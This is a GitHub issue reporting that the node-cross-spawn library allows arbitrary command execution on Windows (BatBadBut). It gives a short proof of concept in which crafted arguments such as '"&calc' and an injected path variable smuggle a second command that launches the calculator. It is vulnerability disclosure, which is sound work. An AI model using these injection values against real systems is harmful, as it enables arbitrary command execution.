node-cross-spawn icon indicating copy to clipboard operation
node-cross-spawn copied to clipboard
verified publisher icon moxystudio

Vulnerable to arbitrary command execution on Windows (BatBadBut)

Open mohd-akram opened this issue 10 months ago • 0 comments

See https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/

Example:

rem test.cmd
echo %1

Arbitrary execution:

const spawn = require('cross-spawn');
// Launches calculator
spawn.sync('test.cmd', ['"&calc']);

Variable expansion:

// test.js
const spawn = require('cross-spawn');
// Launches calculator
spawn.sync('test.cmd', ['%path%']);

C:\> set path^^=^"^&calc
C:\> node test.js

mohd-akram avatar Feb 21 '25 19:02 mohd-akram